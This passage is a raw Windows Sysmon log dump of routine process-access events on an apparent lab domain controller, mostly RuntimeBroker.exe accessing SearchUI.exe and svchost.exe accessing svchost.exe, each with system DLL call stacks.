.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751
|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751
|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
